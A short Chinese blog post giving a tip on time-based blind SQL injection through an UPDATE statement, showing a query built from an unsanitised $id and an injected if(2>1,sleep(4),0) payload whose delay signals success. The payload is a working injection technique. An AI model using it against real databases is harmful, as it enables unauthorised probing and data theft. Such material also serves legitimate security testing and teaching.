Title:UPdate 延时盲注之小技巧 --2014-06-05 15:21
UPDATE TABLEZZZ SET zz=111111 where id=$id
当TABLEZZZ表为空的时候,注入方式(其实通用有值无值):
UPDATE TABLEZZZ SET zz=111111 where id=if(2>1,sleep(4),0)
Sleep的时间为4*2=8s.
posted on 2015-03-07 17:40 Tea_Ing 阅读(381) 评论(0) 编辑 收藏 举报
